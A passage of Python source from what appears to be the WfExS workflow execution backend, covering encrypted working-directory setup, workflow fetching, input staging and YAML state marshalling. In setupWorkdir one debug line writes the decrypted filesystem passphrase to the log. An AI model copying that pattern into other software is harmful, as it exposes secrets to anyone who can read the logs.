if not os.path.isabs(workDir):
workDir = os.path.normpath(os.path.join(config_directory, workDir))
os.makedirs(workDir, exist_ok=True)
else:
workDir = tempfile.mkdtemp(prefix='WfExS-workdir', suffix='backend')
# Assuring this temporal directory is removed at the end
atexit.register(shutil.rmtree, workDir)
self.baseWorkDir = workDir
self.rawWorkDir = None
self.workDir = None
self.encWorkDir = None
self.tempDir = None
self.encfsThread = None
self.doUnmount = False
self.paranoidMode = False
self.bag = None
self.stageMarshalled = False
self.executionMarshalled = False
self.exportMarshalled = False
# cacheHandler is created on first use
self.cacheHandler = SchemeHandlerCacheHandler(self.cacheDir, {})
# All the custom ones should be added here
self.cacheHandler.addSchemeHandlers(PRIDE_SCHEME_HANDLERS)
self.cacheHandler.addSchemeHandlers(INTERNAL_TRS_SCHEME_HANDLERS)
# These ones should have prevalence over other custom ones
self.cacheHandler.addSchemeHandlers(DEFAULT_SCHEME_HANDLERS)
def newSetup(self,
workflow_id,
version_id,
descriptor_type=None,
trs_endpoint=DEFAULT_TRS_ENDPOINT,
params=None,
outputs=None,
workflow_config=None,
creds_config=None
):
"""
Init function
:param workflow_id: A unique identifier of the workflow. Although it is an integer in WorkflowHub,
we cannot assume it is so in all the GA4GH TRS implementations which are exposing workflows.
:param version_id: An identifier of the workflow version. Although it is an integer in
WorkflowHub, we cannot assume the format of the version id, as it could follow semantic
versioning, providing an UUID, etc.
:param descriptor_type: The type of descriptor that represents this version of the workflow
(e.g. CWL, WDL, NFL, or GALAXY). It is optional, so it is guessed from the calls to the API.
:param trs_endpoint: The TRS endpoint used to find the workflow.
:param params: Optional params for the workflow execution.
:param outputs:
:param workflow_config: Tweaks for workflow enactment, like some overrides
:param creds_config: Dictionary with the different credential contexts
:type workflow_id: str
:type version_id: str
:type descriptor_type: str
:type trs_endpoint: str
:type params: dict
:type outputs: dict
:type workflow_config: dict
:type creds_config: dict
"""
if not isinstance(workflow_config, dict):
workflow_config = {}
workflow_meta = {
'workflow_id': workflow_id
}
if version_id is not None:
workflow_meta['version'] = version_id
if descriptor_type is not None:
workflow_meta['workflow_type'] = descriptor_type
if trs_endpoint is not None:
workflow_meta['trs_endpoint'] = trs_endpoint
if workflow_config is not None:
workflow_meta['workflow_config'] = workflow_config
if params is not None:
workflow_meta['params'] = params
if outputs is not None:
workflow_meta['outputs'] = outputs
valErrors = self.ConfigValidate(workflow_meta, self.STAGE_DEFINITION_SCHEMA)
if len(valErrors) > 0:
self.logger.error(f'ERROR in workflow staging definition block: {valErrors}')
raise WFException(f'ERROR in workflow staging definition block: {valErrors}')
if not isinstance(creds_config, dict):
creds_config = {}
valErrors = self.ConfigValidate(creds_config, self.SECURITY_CONTEXT_SCHEMA)
if len(valErrors) > 0:
self.logger.error(f'ERROR in security context block: {valErrors}')
raise WFException(f'ERROR in security context block: {valErrors}')
if not isinstance(params, dict):
params = {}
if not isinstance(outputs, dict):
outputs = {}
# Workflow-specific
self.workflow_config = workflow_config
self.creds_config = creds_config
self.id = str(workflow_id)
self.version_id = str(version_id)
self.descriptor_type = descriptor_type
self.params = params
self.outputs = self.parseExpectedOutputs(outputs)
# The endpoint should always end with a slash
if isinstance(trs_endpoint, str):
if trs_endpoint[-1] != '/':
trs_endpoint += '/'
# Removing the tools suffix, which appeared in first WfExS iterations
if trs_endpoint.endswith('/' + self.TRS_TOOLS_PATH):
trs_endpoint = trs_endpoint[0:-len(self.TRS_TOOLS_PATH)]
self.trs_endpoint = trs_endpoint
if self.rawWorkDir is None:
self.instanceId = str(uuid.uuid4())
# This directory is the raw working directory
# If the intermediate results should be hold in an encrypted
# temporary directory, this directory will hold it
uniqueRawWorkDir = os.path.join(self.baseWorkDir, self.instanceId)
os.makedirs(uniqueRawWorkDir, exist_ok=True)
self.rawWorkDir = uniqueRawWorkDir
# TODO: enforce restrictive permissions on each raw working directory
self.allowOther = False
self.secure = workflow_config.get('secure', True)
if self.workDir is None:
doSecureWorkDir = self.secure or self.paranoidMode
self.setupWorkdir(doSecureWorkDir)
# This directory will hold either symbolic links to the cached
# inputs, or the inputs properly post-processed (decompressed,
# decrypted, etc....)
self.inputsDir = os.path.join(self.workDir, WORKDIR_INPUTS_RELDIR)
os.makedirs(self.inputsDir, exist_ok=True)
# This directory should hold intermediate workflow steps results
self.intermediateDir = os.path.join(self.workDir, WORKDIR_INTERMEDIATE_RELDIR)
os.makedirs(self.intermediateDir, exist_ok=True)
# This directory will hold the final workflow results, which could
# be either symbolic links to the intermediate results directory
# or newly generated content
self.outputsDir = os.path.join(self.workDir, WORKDIR_OUTPUTS_RELDIR)
os.makedirs(self.outputsDir, exist_ok=True)
# This directory is here for those files which are created in order
# to tweak or patch workflow executions
self.engineTweaksDir = os.path.join(self.workDir, WORKDIR_ENGINE_TWEAKS_RELDIR)
os.makedirs(self.engineTweaksDir, exist_ok=True)
# This directory will hold metadata related to the execution
self.metaDir = os.path.join(self.workDir, WORKDIR_META_RELDIR)
os.makedirs(self.metaDir, exist_ok=True)
self.marshallConfig(overwrite=False)
self.repoURL = None
self.repoTag = None
self.repoRelPath = None
self.repoDir = None
self.repoEffectiveCheckout = None
self.engine = None
self.engineVer = None
self.engineDesc = None
self.materializedParams = None
self.localWorkflow = None
self.materializedEngine = None
self.listOfContainers = None
self.exitVal = None
self.augmentedInputs = None
self.matCheckOutputs = None
self.cacheROCrateFilename = None
return self
FUSE_SYSTEM_CONF = '/etc/fuse.conf'
def setupWorkdir(self, doSecureWorkDir):
uniqueRawWorkDir = self.rawWorkDir
allowOther = False
if doSecureWorkDir:
# We need to detect whether fuse has enabled user_allow_other
# the only way I know is parsing /etc/fuse.conf
if not self.paranoidMode and os.path.exists(self.FUSE_SYSTEM_CONF):
with open(self.FUSE_SYSTEM_CONF, mode="r") as fsc:
for line in fsc:
if line.startswith('user_allow_other'):
allowOther = True
break
self.logger.debug(f"FUSE has user_allow_other: {allowOther}")
uniqueEncWorkDir = os.path.join(uniqueRawWorkDir, '.crypt')
uniqueWorkDir = os.path.join(uniqueRawWorkDir, 'work')
# The directories should exist before calling encryption FS mount
os.makedirs(uniqueEncWorkDir, exist_ok=True)
os.makedirs(uniqueWorkDir, exist_ok=True)
# This is the passphrase needed to decrypt the filesystem
passphraseFile = os.path.join(uniqueRawWorkDir, WORKDIR_PASSPHRASE_FILE)
encfs_cmd = self.encfs_cmd
if os.path.exists(passphraseFile):
clearF = io.BytesIO()
with open(passphraseFile, mode="rb") as encF:
crypt4gh.lib.decrypt(
[(0, self.privKey, None)],
encF,
clearF,
offset=0,
span=None,
sender_pubkey=None
)
encfs_type, _, securePassphrase = clearF.getvalue().decode('utf-8').partition('=')
self.logger.debug(encfs_type + ' ' + securePassphrase)
try:
encfs_type = EncryptedFSType(encfs_type)
except:
raise WFException('Invalid encryption filesystem {} in working directory'.format(encfs_type))
if encfs_type not in ENCRYPTED_FS_MOUNT_IMPLEMENTATIONS:
raise WFException('FIXME: Encryption filesystem {} mount procedure is not implemented')
# If the working directory encrypted filesystem does not
# match the configured one, use its default executable
if encfs_type != self.encfs_type:
encfs_cmd = DEFAULT_ENCRYPTED_FS_CMD[encfs_type]
if securePassphrase == '':
raise WFException('Encryption filesystem key does not follow the right format')
else:
securePassphrase = self.generate_passphrase()
encfs_type = self.encfs_type
clearF = io.BytesIO((encfs_type.value + '=' + securePassphrase).encode('utf-8'))
with open(passphraseFile, mode="wb") as encF:
crypt4gh.lib.encrypt(
[(0, self.privKey, self.pubKey)],
clearF,
encF,
offset=0,
span=None
)
del clearF
# Warn/fail earlier
if os.path.ismount(uniqueWorkDir):
# raise WFException("Destination mount point {} is already in use")
self.logger.warning("Destination mount point {} is already in use".format(uniqueWorkDir))
else:
# Now, time to mount the encrypted FS
ENCRYPTED_FS_MOUNT_IMPLEMENTATIONS[encfs_type](encfs_cmd, self.encfs_idleMinutes, uniqueEncWorkDir,
uniqueWorkDir, uniqueRawWorkDir, securePassphrase,
allowOther)
# and start the thread which keeps the mount working
self.encfsThread = threading.Thread(target=self._wakeupEncDir, daemon=True)
self.encfsThread.start()
# We are going to unmount what we have mounted
self.doUnmount = True
# self.encfsPassphrase = securePassphrase
del securePassphrase
else:
uniqueEncWorkDir = None
uniqueWorkDir = uniqueRawWorkDir
# The temporary directory is in the raw working directory as
# some container engine could fail
uniqueTempDir = os.path.join(uniqueRawWorkDir,'.TEMP')
os.makedirs(uniqueTempDir, exist_ok=True)
os.chmod(uniqueTempDir, 0o1777)
# Setting up working directories, one per instance
self.encWorkDir = uniqueEncWorkDir
self.workDir = uniqueWorkDir
self.tempDir = uniqueTempDir
self.allowOther = allowOther
def _wakeupEncDir(self):
"""
This method periodically checks whether the directory is still available
"""
while True:
time.sleep(60)
os.path.isdir(self.workDir)
def unmountWorkdir(self):
if self.doUnmount and (self.encWorkDir is not None):
# Only unmount if it is needed
if os.path.ismount(self.workDir):
with tempfile.NamedTemporaryFile() as encfs_umount_stdout, tempfile.NamedTemporaryFile() as encfs_umount_stderr:
fusermountCommand = [
self.fusermount_cmd,
'-u', # Umount the directory
'-z', # Even if it is not possible to umount it now, hide the mount point
self.workDir,
]
retval = subprocess.Popen(
fusermountCommand,
stdout=encfs_umount_stdout,
stderr=encfs_umount_stderr,
).wait()
if retval != 0:
with open(encfs_umount_stdout.name, mode="r") as c_stF:
encfs_umount_stdout_v = c_stF.read()
with open(encfs_umount_stderr.name, mode="r") as c_stF:
encfs_umount_stderr_v = c_stF.read()
errstr = "Could not umount {} (retval {})\nCommand: {}\n======\nSTDOUT\n======\n{}\n======\nSTDERR\n======\n{}".format(
self.encfs_type, retval, ' '.join(fusermountCommand), encfs_umount_stdout_v,
encfs_umount_stderr_v)
raise WFException(errstr)
# This is needed to avoid double work
self.doUnmount = False
self.encWorkDir = None
self.workDir = None
def cleanup(self):
self.unmountWorkdir()
def fromWorkDir(self, workflowWorkingDirectory):
if workflowWorkingDirectory is None:
raise WFException('Unable to initialize, no directory provided')
# Obtaining the absolute path to the working directory
if not os.path.isabs(workflowWorkingDirectory):
workflowWorkingDirectory = os.path.normpath(os.path.join(self.baseWorkDir, workflowWorkingDirectory))
if not os.path.isdir(workflowWorkingDirectory):
raise WFException('Unable to initialize, {} is not a directory'.format(workflowWorkingDirectory))
self.rawWorkDir = workflowWorkingDirectory
self.instanceId = os.path.basename(workflowWorkingDirectory)
# This is needed to parse
passphraseFile = os.path.join(self.rawWorkDir, WORKDIR_PASSPHRASE_FILE)
# Setting up the directory
self.setupWorkdir(os.path.exists(passphraseFile))
metaDir = os.path.join(self.workDir, WORKDIR_META_RELDIR)
if not os.path.isdir(metaDir):
raise WFException("Staged working directory {} is incomplete".format(self.workDir))
# In order to be able to build next paths to call
workflowMetaFilename = os.path.join(metaDir, WORKDIR_WORKFLOW_META_FILE)
securityContextFilename = os.path.join(metaDir, WORKDIR_SECURITY_CONTEXT_FILE)
return self.fromFiles(workflowMetaFilename, securityContextFilename)
def enableParanoidMode(self):
self.paranoidMode = True
def fromFiles(self, workflowMetaFilename, securityContextsConfigFilename=None, paranoidMode=False):
with open(workflowMetaFilename, mode="r", encoding="utf-8") as wcf:
workflow_meta = unmarshall_namedtuple(yaml.load(wcf, Loader=YAMLLoader))
# Last, try loading the security contexts credentials file
if securityContextsConfigFilename and os.path.exists(securityContextsConfigFilename):
with open(securityContextsConfigFilename, mode="r", encoding="utf-8") as scf:
creds_config = unmarshall_namedtuple(yaml.load(scf, Loader=YAMLLoader))
else:
creds_config = {}
return self.fromDescription(workflow_meta, creds_config, paranoidMode=paranoidMode)
def validateConfigFiles(self, workflowMetaFilename, securityContextsConfigFilename=None):
numErrors = 0
self.logger.info(f'Validating {workflowMetaFilename}')
with open(workflowMetaFilename, mode="r", encoding="utf-8") as wcf:
workflow_meta = unmarshall_namedtuple(yaml.load(wcf, Loader=YAMLLoader))
if not isinstance(workflow_meta, dict):
workflow_meta = {}
valErrors = self.ConfigValidate(workflow_meta, self.STAGE_DEFINITION_SCHEMA)
if len(valErrors) == 0:
self.logger.info('No validation errors in staging definition block')
else:
for iErr, valError in enumerate(valErrors):
self.logger.error(f'ERROR {iErr} in staging definition block: {valError}')
numErrors += 1
# Last, try loading the security contexts credentials file
if securityContextsConfigFilename and os.path.exists(securityContextsConfigFilename):
self.logger.info(f'Validating {securityContextsConfigFilename}')
with open(securityContextsConfigFilename, mode="r", encoding="utf-8") as scf:
creds_config = unmarshall_namedtuple(yaml.load(scf, Loader=YAMLLoader))
valErrors = self.ConfigValidate(creds_config, self.SECURITY_CONTEXT_SCHEMA)
if len(valErrors) == 0:
self.logger.info('No validation errors in security block')
else:
for iErr, valError in enumerate(valErrors):
self.logger.error(f'ERROR {iErr} in security context block: {valError}')
numErrors += 1
return 1 if numErrors > 0 else 0
def fromDescription(self, workflow_meta, creds_config=None, paranoidMode=False):
"""
:param workflow_meta: The configuration describing both the workflow
and the inputs to use when it is being instantiated.
:param creds_config: Dictionary with the different credential contexts (to be implemented)
:param paranoidMode:
:type workflow_meta: dict
:type creds_config: dict
:type paranoidMode:
:return: Workflow configuration
"""
# The preserved paranoid mode must be honoured
preserved_paranoid_mode = workflow_meta.get('paranoid_mode')
if preserved_paranoid_mode is not None:
paranoidMode = preserved_paranoid_mode
if paranoidMode:
self.enableParanoidMode()
return self.newSetup(
workflow_meta['workflow_id'],
workflow_meta.get('version'),
descriptor_type=workflow_meta.get('workflow_type'),
trs_endpoint=workflow_meta.get('trs_endpoint', self.DEFAULT_TRS_ENDPOINT),
params=workflow_meta.get('params', {}),
outputs=workflow_meta.get('outputs', {}),
workflow_config=workflow_meta.get('workflow_config'),
creds_config=creds_config
)
def fromForm(self, workflow_meta, paranoidMode=False): # VRE
"""
:param workflow_meta: The configuration describing both the workflow
and the inputs to use when it is being instantiated.
:param paranoidMode:
:type workflow_meta: dict
:type paranoidMode:
:return: Workflow configuration
"""
if paranoidMode:
self.enableParanoidMode()
return self.newSetup(
workflow_meta['workflow_id'],
workflow_meta.get('version'),
descriptor_type=workflow_meta.get('workflow_type'),
trs_endpoint=workflow_meta.get('trs_endpoint', self.DEFAULT_TRS_ENDPOINT),
params=workflow_meta.get('params', {}),
workflow_config=workflow_meta.get('workflow_config')
)
def fetchWorkflow(self, offline=False):
"""
Fetch the whole workflow description based on the data obtained
from the TRS where it is being published.
If the workflow id is an URL, it is supposed to be a git repository,
and the version will represent either the branch, tag or specific commit.
So, the whole TRS fetching machinery is bypassed.
"""
parsedRepoURL = parse.urlparse(self.id)
# It is not an absolute URL, so it is being an identifier in the workflow
if parsedRepoURL.scheme == '':
if (self.trs_endpoint is not None) and len(self.trs_endpoint) > 0:
engineDesc, repoURL, repoTag, repoRelPath = self.getWorkflowRepoFromTRS(offline=offline)
else:
raise WFException('trs_endpoint was not provided')
else:
engineDesc = None
# Trying to be smarter
guessedRepoURL, guessedRepoTag, guessedRepoRelPath = self.guessRepoParams(parsedRepoURL, fail_ok=False)
if guessedRepoURL is not None:
repoURL = guessedRepoURL
repoTag = guessedRepoTag if guessedRepoTag is not None else self.version_id
repoRelPath = guessedRepoRelPath
else:
engineDesc, repoURL, repoTag, repoRelPath = self.getWorkflowRepoFromROCrateURL(self.id, offline=offline)
if repoURL is None:
# raise WFException('Unable to guess repository from RO-Crate manifest')
repoURL = self.id
repoTag = self.version_id
repoRelPath = None
repoDir = None
repoEffectiveCheckout = None
if ':' in repoURL:
parsedRepoURL = parse.urlparse(repoURL)
if len(parsedRepoURL.scheme) > 0:
self.repoURL = repoURL
self.repoTag = repoTag
# It can be either a relative path to a directory or to a file
# It could be even empty!
if repoRelPath == '':
repoRelPath = None
self.repoRelPath = repoRelPath
repoDir, repoEffectiveCheckout = self.doMaterializeRepo(repoURL, repoTag)
# For the cases of pure TRS repos, like Dockstore
if repoDir is None:
repoDir = repoURL
# Workflow Language version cannot be assumed here yet
localWorkflow = LocalWorkflow(dir=repoDir, relPath=repoRelPath, effectiveCheckout=repoEffectiveCheckout)
self.logger.info("materialized workflow repository (checkout {}): {}".format(repoEffectiveCheckout, repoDir))
if repoRelPath is not None:
if not os.path.exists(os.path.join(repoDir, repoRelPath)):
raise WFException(
"Relative path {} cannot be found in materialized workflow repository {}".format(repoRelPath,
repoDir))
# A valid engine must be identified from the fetched content
# TODO: decide whether to force some specific version
if engineDesc is None:
for engineDesc in self.WORKFLOW_ENGINES:
self.logger.debug("Testing engine " + engineDesc.trs_descriptor)
engine = engineDesc.clazz(cacheDir=self.cacheDir, workflow_config=self.workflow_config,
local_config=self.local_config, engineTweaksDir=self.engineTweaksDir,
cacheWorkflowDir=self.cacheWorkflowDir,
cacheWorkflowInputsDir=self.cacheWorkflowInputsDir,
workDir=self.workDir,
outputsDir=self.outputsDir, intermediateDir=self.intermediateDir,
tempDir=self.tempDir, secure_exec=self.secure or self.paranoidMode,
allowOther=self.allowOther, config_directory=self.config_directory)
try:
engineVer, candidateLocalWorkflow = engine.identifyWorkflow(localWorkflow)
self.logger.debug("Tested engine {} {}".format(engineDesc.trs_descriptor, engineVer))
if engineVer is not None:
break
except WorkflowEngineException:
# TODO: store the exceptions, to be shown if no workflow is recognized
pass
else:
raise WFException('No engine recognized a workflow at {}'.format(repoURL))
else:
self.logger.debug("Fixed engine " + engineDesc.trs_descriptor)
engine = engineDesc.clazz(cacheDir=self.cacheDir, workflow_config=self.workflow_config,
local_config=self.local_config, engineTweaksDir=self.engineTweaksDir,
cacheWorkflowDir=self.cacheWorkflowDir,
cacheWorkflowInputsDir=self.cacheWorkflowInputsDir,
workDir=self.workDir,
outputsDir=self.outputsDir, intermediateDir=self.intermediateDir,
tempDir=self.tempDir, secure_exec=self.secure or self.paranoidMode,
allowOther=self.allowOther, config_directory=self.config_directory)
engineVer, candidateLocalWorkflow = engine.identifyWorkflow(localWorkflow)
if engineVer is None:
raise WFException(
'Engine {} did not recognize a workflow at {}'.format(engine.workflowType.engineName, repoURL))
self.repoDir = repoDir
self.repoEffectiveCheckout = repoEffectiveCheckout
self.engineDesc = engineDesc
self.engine = engine
self.engineVer = engineVer
self.localWorkflow = candidateLocalWorkflow
def setupEngine(self, offline=False):
# The engine is populated by self.fetchWorkflow()
if self.engine is None:
self.fetchWorkflow(offline=offline)
if self.materializedEngine is None:
localWorkflow = self.localWorkflow
else:
localWorkflow = self.materializedEngine.workflow
self.materializedEngine = self.engine.materializeEngine(localWorkflow, self.engineVer)
def materializeWorkflow(self, offline=False):
if self.materializedEngine is None:
self.setupEngine(offline=offline)
# This information is badly needed for provenance
if self.listOfContainers is None:
self.materializedEngine, self.listOfContainers = WorkflowEngine.MaterializeWorkflow(self.materializedEngine, offline=offline)
def addSchemeHandler(self, scheme, handler):
"""
:param scheme:
:param handler:
"""
if not isinstance(handler, (
types.FunctionType, types.LambdaType, types.MethodType, types.BuiltinFunctionType,
types.BuiltinMethodType)):
raise WFException('Trying to set for scheme {} a invalid handler'.format(scheme))
self.cacheHandler.addSchemeHandlers({scheme.lower(): handler})
def injectInputs(self, paths, workflowInputs_destdir=None, workflowInputs_cacheDir=None, lastInput=0):
if workflowInputs_destdir is None:
workflowInputs_destdir = self.inputsDir
if workflowInputs_cacheDir is None:
workflowInputs_cacheDir = self.cacheWorkflowInputsDir
cacheable = not self.paranoidMode
# The storage dir depends on whether it can be cached or not
storeDir = workflowInputs_cacheDir if cacheable else workflowInputs_destdir
for path in paths:
# We are sending the context name thinking in the future,
# as it could contain potential hints for authenticated access
fileuri = parse.urlunparse(('file', '', os.path.abspath(path), '', '', ''))
matContent = self.downloadInputFile(fileuri, workflowInputs_destdir=storeDir, ignoreCache=not cacheable, registerInCache=cacheable)
# Now, time to create the symbolic link
lastInput += 1
prettyLocal = os.path.join(workflowInputs_destdir, matContent.prettyFilename)
hardenPrettyLocal = False
if os.path.islink(prettyLocal):
oldLocal = os.readlink(prettyLocal)
hardenPrettyLocal = oldLocal != matContent.local
elif os.path.exists(prettyLocal):
hardenPrettyLocal = True
if hardenPrettyLocal:
# Trying to avoid collisions on input naming
prettyLocal = os.path.join(workflowInputs_destdir, str(lastInput) + '_' + matContent.prettyFilename)
if not os.path.exists(prettyLocal):
os.symlink(matContent.local, prettyLocal)
return lastInput
def materializeInputs(self, offline: bool = False, lastInput=0):
theParams, numInputs = self.fetchInputs(self.params, workflowInputs_destdir=self.inputsDir,
workflowInputs_cacheDir=self.cacheWorkflowInputsDir, offline=offline,
lastInput=lastInput)
self.materializedParams = theParams
def fetchInputs(self, params, workflowInputs_destdir: AbsPath = None, workflowInputs_cacheDir: AbsPath = None,
prefix='', lastInput=0, offline: bool = False) -> Tuple[List[MaterializedInput], int]:
"""
Fetch the input files for the workflow execution.
All the inputs must be URLs or CURIEs from identifiers.org / n2t.net.
:param params: Optional params for the workflow execution.
:param workflowInputs_destdir:
:param prefix:
:param workflowInputs_cacheDir:
:param lastInput:
:param offline:
:type params: dict
:type prefix: str
"""
theInputs = []
paramsIter = params.items() if isinstance(params, dict) else enumerate(params)
for key, inputs in paramsIter:
# We are here for the
linearKey = prefix + key
if isinstance(inputs, dict):
inputClass = inputs.get('c-l-a-s-s')
if inputClass is not None:
if inputClass in ("File", "Directory"): # input files
inputDestDir = workflowInputs_destdir
globExplode = None
if inputClass == 'Directory':
# We have to autofill this with the outputs directory,
# so results are properly stored (without escaping the jail)
if inputs.get('autoFill', False):
if inputs.get('autoPrefix', True):
autoFilledDir = os.path.join(self.outputsDir, *linearKey.split('.'))
else:
autoFilledDir = self.outputsDir
theInputs.append(MaterializedInput(linearKey, [autoFilledDir]))
continue
globExplode = inputs.get('globExplode')
# This is to nest the directory where to place the different files
inputDestDir = os.path.join(inputDestDir, *linearKey.split('.'))
os.makedirs(inputDestDir, exist_ok=True)
remote_files = inputs['url']
cacheable = not self.paranoidMode if inputs.get('cache', True) else False
if not isinstance(remote_files, list): # more than one input file
remote_files = [remote_files]
remote_pairs = []
# The storage dir depends on whether it can be cached or not
storeDir = workflowInputs_cacheDir if cacheable else inputDestDir
for remote_file in remote_files:
# We are sending the context name thinking in the future,
# as it could contain potential hints for authenticated access
contextName = inputs.get('security-context')
matContent = self.downloadInputFile(remote_file,
workflowInputs_destdir=storeDir,
contextName=contextName,
offline=offline,
ignoreCache=not cacheable,
registerInCache=cacheable,
)
# Now, time to create the symbolic link
lastInput += 1
prettyLocal = os.path.join(inputDestDir, matContent.prettyFilename)
hardenPrettyLocal = False
if os.path.islink(prettyLocal):
oldLocal = os.readlink(prettyLocal)
hardenPrettyLocal = oldLocal != matContent.local
elif os.path.exists(prettyLocal):
hardenPrettyLocal = True
if hardenPrettyLocal:
# Trying to avoid collisions on input naming
prettyLocal = os.path.join(inputDestDir,
str(lastInput) + '_' + matContent.prettyFilename)
if not os.path.exists(prettyLocal):
os.symlink(matContent.local, prettyLocal)
if globExplode is not None:
prettyLocalPath = pathlib.Path(prettyLocal)
matParse = parse.urlparse(matContent.uri)
for exp in prettyLocalPath.glob(globExplode):
relPath = exp.relative_to(prettyLocalPath)
relName = str(relPath)
relExpPath = matParse.path
if relExpPath[-1] != '/':
relExpPath += '/'
relExpPath += '/'.join(map(lambda part: parse.quote_plus(part), relPath.parts))
expUri = parse.urlunparse((matParse.scheme, matParse.netloc, relExpPath, matParse.params, matParse.query, matParse.fragment))
remote_pairs.append(
MaterializedContent(
local=str(exp),
uri=expUri,
prettyFilename=relName,
metadata_array=matContent.metadata_array,
kind=ContentKind.Directory if exp.is_dir() else ContentKind.File
)
)
else:
remote_pairs.append(
MaterializedContent(prettyLocal, matContent.uri, matContent.prettyFilename,
matContent.kind, matContent.metadata_array))
theInputs.append(MaterializedInput(linearKey, remote_pairs))
else:
raise WFException(
'Unrecognized input class "{}", attached to "{}"'.format(inputClass, linearKey))
else:
# possible nested files
newInputsAndParams, lastInput = self.fetchInputs(inputs,
workflowInputs_destdir=workflowInputs_destdir,
workflowInputs_cacheDir=workflowInputs_cacheDir,
prefix=linearKey + '.', lastInput=lastInput,
offline=offline)
theInputs.extend(newInputsAndParams)
else:
if not isinstance(inputs, list):
inputs = [inputs]
theInputs.append(MaterializedInput(linearKey, inputs))
return theInputs, lastInput
def stageWorkDir(self):
"""
This method is here to simplify the understanding of the needed steps
"""
self.fetchWorkflow()
self.setupEngine()
self.materializeWorkflow()
self.materializeInputs()
self.marshallStage()
return self.instanceId
def workdirToBagit(self):
"""
BEWARE: This is a destructive step! So, once run, there is no back!
"""
self.bag = bagit.make_bag(self.workDir)
DefaultCardinality = '1'
CardinalityMapping = {
'1': (1, 1),
'?': (0, 1),
'*': (0, sys.maxsize),
'+': (1, sys.maxsize),
}
OutputClassMapping = {
ContentKind.File.name: ContentKind.File,
ContentKind.Directory.name: ContentKind.Directory,
ContentKind.Value.name: ContentKind.Value,
}
def parseExpectedOutputs(self, outputs: Union[List[Any], Mapping[str, Any]]) -> List[ExpectedOutput]:
expectedOutputs = []
# TODO: implement parsing of outputs
outputsIter = outputs.items() if isinstance(outputs, dict) else enumerate(outputs)
for outputKey, outputDesc in outputsIter:
# The glob pattern
patS = outputDesc.get('glob')
if patS is not None:
if len(patS) == 0:
patS = None
# Parsing the cardinality
cardS = outputDesc.get('cardinality')
cardinality = None
if cardS is not None:
if isinstance(cardS, int):
if cardS < 1:
cardinality = (0, 1)
else:
cardinality = (cardS, cardS)
elif isinstance(cardS, list):
cardinality = (int(cardS[0]), int(cardS[1]))
else:
cardinality = self.CardinalityMapping.get(cardS)
if cardinality is None:
cardinality = self.CardinalityMapping[self.DefaultCardinality]
eOutput = ExpectedOutput(
name=outputKey,
kind=self.OutputClassMapping.get(outputDesc.get('c-l-a-s-s'), ContentKind.File.name),
preferredFilename=outputDesc.get('preferredName'),
cardinality=cardinality,
glob=patS,
)
expectedOutputs.append(eOutput)
return expectedOutputs
def executeWorkflow(self, offline : bool = False):
self.unmarshallStage(offline=offline)
exitVal, augmentedInputs, matCheckOutputs = WorkflowEngine.ExecuteWorkflow(self.materializedEngine,
self.materializedParams,
self.outputs)
self.exitVal = exitVal
self.augmentedInputs = augmentedInputs
self.matCheckOutputs = matCheckOutputs
self.logger.debug(exitVal)
self.logger.debug(augmentedInputs)
self.logger.debug(matCheckOutputs)
# TODO: implement store serialized version of exitVal, augmentedInputs and matCheckOutputs
self.marshallExecute()
def exportResults(self):
self.unmarshallExecute(offline=True)
# TODO
self.marshallExport()
def marshallConfig(self, overwrite : bool = False):
workflow_meta_file = os.path.join(self.metaDir, WORKDIR_WORKFLOW_META_FILE)
if overwrite or not os.path.exists(workflow_meta_file):
with open(workflow_meta_file, mode='w', encoding='utf-8') as wmF:
workflow_meta = {
'workflow_id': self.id,
'paranoid_mode': self.paranoidMode
}
if self.version_id is not None:
workflow_meta['version'] = self.version_id
if self.descriptor_type is not None:
workflow_meta['workflow_type'] = self.descriptor_type
if self.trs_endpoint is not None:
workflow_meta['trs_endpoint'] = self.trs_endpoint
if self.workflow_config is not None:
workflow_meta['workflow_config'] = self.workflow_config
if self.params is not None:
workflow_meta['params'] = self.params
if self.outputs is not None:
outputs = { output.name: output for output in self.outputs }
workflow_meta['outputs'] = outputs
yaml.dump(marshall_namedtuple(workflow_meta), wmF, Dumper=YAMLDumper)
creds_file = os.path.join(self.metaDir, WORKDIR_SECURITY_CONTEXT_FILE)
if overwrite or not os.path.exists(creds_file):
with open(creds_file, mode='w', encoding='utf-8') as crF:
yaml.dump(marshall_namedtuple(self.creds_config), crF, Dumper=YAMLDumper)
def marshallStage(self, exist_ok : bool = True):
if not self.stageMarshalled:
self.marshallConfig(overwrite=False)
marshalled_stage_file = os.path.join(self.metaDir, WORKDIR_MARSHALLED_STAGE_FILE)
if os.path.exists(marshalled_stage_file):
if not exist_ok:
raise WFException("Marshalled stage file already exists")
self.logger.debug("Marshalled stage file {} already exists".format(marshalled_stage_file))
else:
stage = {
'repoURL': self.repoURL,
'repoTag': self.repoTag,
'repoRelPath': self.repoRelPath,
'repoEffectiveCheckout': self.repoEffectiveCheckout,
'engineDesc': self.engineDesc,
'engineVer': self.engineVer,
'materializedEngine': self.materializedEngine,
'containers': self.listOfContainers,
'materializedParams': self.materializedParams
# TODO: check nothing essential was left
}
self.logger.debug("Creating marshalled stage file {}".format(marshalled_stage_file))
with open(marshalled_stage_file, mode='w', encoding='utf-8') as msF:
marshalled_stage = marshall_namedtuple(stage)
yaml.dump(marshalled_stage, msF, Dumper=YAMLDumper)
self.stageMarshalled = True
elif not exist_ok:
raise WFException("Marshalled stage file already exists")
def unmarshallStage(self, offline : bool = False):
if not self.stageMarshalled:
marshalled_stage_file = os.path.join(self.metaDir, WORKDIR_MARSHALLED_STAGE_FILE)
if not os.path.exists(marshalled_stage_file):
raise WFException("Marshalled stage file does not exists. Stage state was not stored")
self.logger.debug("Parsing marshalled stage state file {}".format(marshalled_stage_file))
with open(marshalled_stage_file, mode='r', encoding='utf-8') as msF:
marshalled_stage = yaml.load(msF, Loader=YAMLLoader)
try:
stage = unmarshall_namedtuple(marshalled_stage, globals())
self.repoURL = stage['repoURL']
self.repoTag = stage['repoTag']
self.repoRelPath = stage['repoRelPath']
self.repoEffectiveCheckout = stage['repoEffectiveCheckout']
self.engineDesc = stage['engineDesc']
self.engineVer = stage['engineVer']
self.materializedEngine = stage['materializedEngine']
self.listOfContainers = stage['containers']
self.materializedParams = stage['materializedParams']
# This is needed to properly set up the materializedEngine
self.setupEngine(offline=True)
except Exception as e:
raise WFException("Error while unmarshalling content from stage state file {}. Reason: {}".format(marshalled_stage_file,e))
self.stageMarshalled = True
def marshallExecute(self, exist_ok : bool = True):
if not self.executionMarshalled:
self.marshallStage(exist_ok=exist_ok)
marshalled_execution_file = os.path.join(self.metaDir, WORKDIR_MARSHALLED_EXECUTE_FILE)
if os.path.exists(marshalled_execution_file):
if not exist_ok:
